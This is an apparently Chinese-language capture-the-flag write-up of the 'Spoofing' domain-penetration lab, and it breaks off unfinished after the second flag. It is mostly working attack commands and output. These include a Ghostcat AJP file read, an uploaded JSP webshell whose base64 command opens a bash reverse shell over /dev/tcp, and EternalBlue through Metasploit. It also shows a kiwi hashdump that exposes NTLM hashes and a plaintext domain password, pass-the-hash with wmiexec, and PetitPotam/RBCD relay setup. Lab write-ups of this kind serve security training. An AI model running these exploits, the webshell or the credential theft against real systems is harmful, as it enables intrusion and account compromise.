Spoofing是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
flag1 入口 Tomcat-172.22.11.76 扫到8080端口
目录扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 E:\小工具\ONE -FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan \dirsearch >python dirsearch.py -u http ://39.98.127.157:8080/ _ |. _ _ _ _ _ _ |_ v0 .4.3 by 鹏组安全 (_ ||| _ ) (/_ (_ || (_ | ) Extensions : php , aspx , jsp , html , js | HTTP method : GET | Threads : 25 | Wordlist size : 11714 Output File : /home /fushuling /.dirsearch /reports /39.98.118.194-8080/_23 -10-13_07 -40-20.txt Error Log : /home /fushuling /.dirsearch /logs /errors -23-10-13_07 -40-20.log Target : http ://39.98.118.194:8080/[07:40:20] Starting : [07:40:22] 302 - 0B - /js -> /js / [07:40:34] 200 - 114B - /404.html [07:40:40] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc \passwd [07:40:41] 400 - 795B - /a %5c.aspx [07:41:14] 302 - 0B - /css -> /css / [07:41:15] 302 - 0B - /data -> /data / [07:41:17] 302 - 0B - /docs -> /docs / [07:41:17] 200 - 17KB - /docs / [07:41:17] 302 - 0B - /download -> /download / [07:41:18] 200 - 132B - /download / [07:41:20] 302 - 0B - /examples -> /examples / [07:41:20] 200 - 6KB - /examples /servlets /index.html [07:41:20] 200 - 1KB - /examples / [07:41:20] 200 - 658B - /examples /servlets /servlet /CookieExample [07:41:20] 200 - 947B - /examples /servlets /servlet /RequestHeaderExample [07:41:20] 200 - 682B - /examples /jsp /snp /snoop.jsp [07:41:26] 403 - 3KB - /host -manager / [07:41:26] 403 - 3KB - /host -manager /html [07:41:27] 302 - 0B - /images -> /images / [07:41:29] 200 - 7KB - /index.html [07:41:33] 302 - 0B - /lib -> /lib / [07:41:37] 302 - 0B - /manager -> /manager / [07:41:37] 403 - 3KB - /manager /admin.asp [07:41:37] 403 - 3KB - /manager / [07:41:37] 403 - 3KB - /manager /login [07:41:37] 403 - 3KB - /manager /status /all [07:41:37] 403 - 3KB - /manager /jmxproxy /?get =java.lang:type =Memory &att =HeapMemoryUsage [07:41:37] 403 - 3KB - /manager /jmxproxy /?get =BEANNAME &att =MYATTRIBUTE &key =MYKEY [07:41:37] 403 - 3KB - /manager /jmxproxy [07:41:37] 403 - 3KB - /manager /jmxproxy /?qry =STUFF [07:41:37] 403 - 3KB - /manager /jmxproxy /?get =java.lang:type =Memory &att =HeapMemoryUsage &key =used [07:41:37] 403 - 3KB - /manager /html / [07:41:37] 403 - 3KB - /manager /VERSION [07:41:37] 403 - 3KB - /manager /jmxproxy /?set =BEANNAME &att =MYATTRIBUTE &val =NEWVALUE [07:41:37] 403 - 3KB - /manager /html [07:41:38] 403 - 3KB - /manager /login.asp [07:41:38] 403 - 3KB - /manager /jmxproxy /?invoke =Catalina %3Atype %3DService &op =findConnectors &ps = [07:41:38] 403 - 3KB - /manager /jmxproxy /?set =Catalina %3Atype %3DValve %2Cname %3DErrorReportValve %2Chost %3Dlocalhost &att =debug &val =cow [07:41:38] 403 - 3KB - /manager /jmxproxy /?invoke =BEANNAME &op =METHODNAME &ps =COMMASEPARATEDPARAMETERS [07:42:11] 403 - 0B - /upload / [07:42:11] 403 - 0B - /upload [07:42:12] 403 - 0B - /upload /b_user.csv [07:42:12] 403 - 0B - /upload /loginIxje.php [07:42:12] 403 - 0B - /upload /test.txt [07:42:12] 403 - 0B - /upload /1.php [07:42:12] 403 - 0B - /upload /test.php [07:42:12] 403 - 0B - /upload /b_user.xls [07:42:12] 403 - 0B - /upload /upload.php [07:42:12] 403 - 0B - /upload /2.php [07:42:12] 200 - 9KB - /user.html Task Completed
CVE-2020-1983 Tomcat文件包含漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 E:\小工具\Ghostcat-CNVD-2020 -10487 >python ajpShooter.py http://39.99 .228 .210 :8080 / 8009 /WEB-INF/web.xml read _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| ' _ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test [<] 200 200 [<] Accept-Ranges: bytes [<] ETag: W/"2489-1670857638305" [<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT [<] Content-Type: application/xml [<] Content-Length: 2489 <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" > <web-app> <display-name>Archetype Created Web Application</display-name> <security-constraint> <display-name>Tomcat Server Configuration Security Constraint</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <url-pattern>/upload/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <error-page> <error-code>404</error-code> <location>/404.html</location> </error-page> <error-page> <error-code>403</error-code> <location>/error.html</location> </error-page> <error-page> <exception-type>java.lang.Throwable</exception-type> <location>/error.html</location> </error-page> <servlet> <servlet-name>HelloServlet</servlet-name> <servlet-class>com.example.HelloServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>HelloServlet</servlet-name> <url-pattern>/HelloServlet</url-pattern> </servlet-mapping> <servlet> <display-name>LoginServlet</display-name> <servlet-name>LoginServlet</servlet-name> <servlet-class>com.example.LoginServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>LoginServlet</servlet-name> <url-pattern>/LoginServlet</url-pattern> </servlet-mapping> <servlet> <display-name>RegisterServlet</display-name> <servlet-name>RegisterServlet</servlet-name> <servlet-class>com.example.RegisterServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>RegisterServlet</servlet-name> <url-pattern>/RegisterServlet</url-pattern> </servlet-mapping> <servlet> <display-name>UploadTestServlet</display-name> <servlet-name>UploadTestServlet</servlet-name> <servlet-class>com.example.UploadTestServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>UploadTestServlet</servlet-name> <url-pattern>/UploadServlet</url-pattern> </servlet-mapping> <servlet> <display-name>DownloadFileServlet</display-name> <servlet-name>DownloadFileServlet</servlet-name> <servlet-class>com.example.DownloadFileServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>DownloadFileServlet</servlet-name> <url-pattern>/DownloadServlet</url-pattern> </servlet-mapping> </web-app>
http://39.99.228.210:8080/UploadServlet
1 2 3 4 5 6 7 8 9 10 <% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgveHh4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); %>
上传后执行eval
1 python ajpShooter.py http://39.99.228.210:8080/ 8009 /upload/a80b42c9eb8e1bf4202c0af1908e479e/20250424012502710.txt eval
拿到flag1
写公钥
flag2 MS17-010-172.22.11.45 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 root@ubuntu:~ root@ubuntu:~ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link /loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link /ether 00:16:3e:26:42:7d brd ff:ff:ff:ff:ff:ff inet 172.22.11.76/16 brd 172.22.255.255 scope global dynamic eth0 valid_lft 315358848sec preferred_lft 315358848sec inet6 fe80::216:3eff:fe26:427d/64 scope link valid_lft forever preferred_lft forever root@ubuntu:~ ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-04-24 13:35:19] [INFO] 暴力破解线程数: 1 [2025-04-24 13:35:19] [INFO] 开始信息扫描 [2025-04-24 13:35:19] [INFO] CIDR范围: 172.22.11.0-172.22.11.255 [2025-04-24 13:35:19] [INFO] 生成IP范围: 172.22.11.0.%!d(string=172.22.11.255) - %!s(MISSING).%!d(MISSING) [2025-04-24 13:35:19] [INFO] 解析CIDR 172.22.11.76/24 -> IP范围 172.22.11.0-172.22.11.255 [2025-04-24 13:35:19] [INFO] 最终有效主机数量: 256 [2025-04-24 13:35:19] [INFO] 开始主机扫描 [2025-04-24 13:35:20] [SUCCESS] 目标 172.22.11.6 存活 (ICMP) [2025-04-24 13:35:20] [SUCCESS] 目标 172.22.11.76 存活 (ICMP) [2025-04-24 13:35:20] [SUCCESS] 目标 172.22.11.26 存活 (ICMP) [2025-04-24 13:35:20] [SUCCESS] 目标 172.22.11.45 存活 (ICMP) [2025-04-24 13:35:23] [INFO] 存活主机数量: 4 [2025-04-24 13:35:23] [INFO] 有效端口数量: 233 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.6:135 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.6:139 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.26:135 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.45:135 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.45:139 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.26:139 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.6:88 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.45:445 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.26:445 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.6:445 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.6:389 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.76:22 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.76:8009 [2025-04-24 13:35:23] [SUCCESS] 端口开放 172.22.11.76:8080 [2025-04-24 13:35:23] [SUCCESS] 服务识别 172.22.11.76:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.6:139 => Banner:[.] [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.45:139 => Banner:[.] [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.26:139 => Banner:[.] [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.6:88 => [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.45:445 => [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.26:445 => [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.6:445 => [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.6:389 => [2025-04-24 13:35:28] [SUCCESS] 服务识别 172.22.11.76:8009 => [2025-04-24 13:35:29] [SUCCESS] 服务识别 172.22.11.76:8080 => [http] [2025-04-24 13:36:28] [SUCCESS] 服务识别 172.22.11.6:135 => [2025-04-24 13:36:28] [SUCCESS] 服务识别 172.22.11.26:135 => [2025-04-24 13:36:28] [SUCCESS] 服务识别 172.22.11.45:135 => [2025-04-24 13:36:28] [INFO] 存活端口数量: 14 [2025-04-24 13:36:28] [INFO] 开始漏洞扫描 [2025-04-24 13:36:28] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle [2025-04-24 13:36:28] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.11.45 主机名: XR-DESKTOP 发现的网络接口: [2025-04-24 13:36:28] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.11.26 主机名: XR-LCM3AE8B 发现的网络接口: IPv4地址: └─ 172.22.11.26 [2025-04-24 13:36:28] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.11.6 主机名: XIAORANG-DC 发现的网络接口: IPv4地址: └─ 172.22.11.6 [2025-04-24 13:36:28] [SUCCESS] 发现漏洞 172.22.11.45 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010 [2025-04-24 13:36:28] [SUCCESS] 172.22.11.26 CVE-2020-0796 SmbGhost Vulnerable [2025-04-24 13:36:28] [SUCCESS] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B [2025-04-24 13:36:28] [SUCCESS] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [2025-04-24 13:36:28] [SUCCESS] NetBios 172.22.11.6 DC:XIAORANG\XIAORANG-DC [2025-04-24 13:36:28] [SUCCESS] 网站标题 http://172.22.11.76:8080 状态码:200 长度:7091 标题:后台管理 [2025-04-24 13:36:53] [SUCCESS] 扫描已完成: 26/26
1 2 3 4 172.22.11.76 已经拿下 172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010 172.22.11.26 XIAORANG\XR-LCM3AE8B 172.22.11.6 XIAORANG\XIAORANG-DC
先打永恒之蓝
1 2 3 4 5 proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOSTS 172.22.11.45 exploit
抓哈希
load kiwi
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 meterpreter >load kiwi meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter > creds_all [proxychains] DLL init: proxychains-ng 4.16 [proxychains] DLL init: proxychains-ng 4.16 [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- XR-DESKTOP$ XIAORANG 578bcc26fbbadeea510280fbfd3859e9 8d91913663e19059d5cfa1e2b2958fd97a407c78 yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) XR-DESKTOP$ XIAORANG 06 22 fe e0 24 5c 76 04 f3 2c 02 93 08 26 cd 3d 0d 36 b7 75 cf 23 18 a9 3c 0c 02 96 e1 52 5f 2a 4e 88 aa d4 ec 21 6e a2 8b 33 3b a8 cf f4 8e bf 2c 75 d0 b9 b9 92 53 65 b2 6 c 6f bf 18 06 59 4e c9 7f ff 5a 0f f4 b5 d9 60 eb 3b 63 ed ae dc 45 44 cd 4e e8 44 9b 6c 39 ce 2f 6e 12 c8 f7 a3 09 0c 2f a8 89 4a a0 92 29 33 27 0c f8 6c 3a 93 5e 6f 77 95 67 e4 36 1a ba 32 df 1a 07 28 39 ca 62 30 66 63 aa e8 57 c0 6b 7f d5 b8 26 a5 da 52 0 b 12 2e 6e c0 d0 3b 5c 94 30 d5 a4 c9 7b 24 50 41 02 22 e7 20 cf b4 bd 33 54 20 85 53 4d 30 58 76 3d fd e1 87 07 7f 51 9d cb 9f 94 7f 53 3e 9d 97 1a 85 47 51 0c e0 50 6b d3 48 2b e5 b6 9f fe ac 6a 00 da 1d 40 25 f4 96 96 bf a2 b0 aa ac 50 55 ca a5 3b d8 9c c a 39 26 c5 dd 96 d9 da 85 e3 08 yangmei XIAORANG xrihGHgoNZQ kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) xr-desktop$ XIAORANG.LAB 06 22 fe e0 24 5c 76 04 f3 2c 02 93 08 26 cd 3d 0d 36 b7 75 cf 23 18 a9 3c 0c 02 9 6 e1 52 5f 2a 4e 88 aa d4 ec 21 6e a2 8b 33 3b a8 cf f4 8e bf 2c 75 d0 b9 b9 92 53 65 b2 6c 6f bf 18 06 59 4e c9 7f ff 5a 0f f4 b5 d9 60 eb 3b 63 ed ae dc 45 44 cd 4e e8 44 9b 6c 39 ce 2f 6e 12 c8 f7 a3 09 0c 2f a8 89 4a a0 92 29 33 27 0c f8 6c 3 a 93 5e 6f 77 95 67 e4 36 1a ba 32 df 1a 07 28 39 ca 62 30 66 63 aa e8 57 c0 6b 7f d5 b8 26 a5 da 52 0b 12 2e 6e c0 d0 3b 5c 94 30 d5 a4 c9 7b 24 50 41 02 22 e7 20 cf b4 bd 33 54 20 85 53 4d 30 58 76 3d fd e1 87 07 7f 51 9d cb 9f 94 7f 53 3e 9d 9 7 1a 85 47 51 0c e0 50 6b d3 48 2b e5 b6 9f fe ac 6a 00 da 1d 40 25 f4 96 96 bf a2 b0 aa ac 50 55 ca a5 3b d8 9c ca 39 26 c5 dd 96 d9 da 85 e3 08 xr-desktop$ XIAORANG.LAB (null) yangmei XIAORANG.LAB xrihGHgoNZQ
msf的shell有点问题 用wmiexec连上去拿到shell
1 proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:48f6da83eb89a4da8a1cc963b855a799 Administrator@172.22.11.45
拿到flag02
发现一个用户
yangmei XIAORANG.LAB xrihGHgoNZQ
petitpotam扫描和WebClient扫描
1 2 proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav
发现有Petitpotam
攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B)
1 2 ssh -i id_rsa_2048 root@39.98.120.46 -D 49.233.121.53:5002 -R \*:79:127.0.0.1:80 nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
后面没打完 先不写了
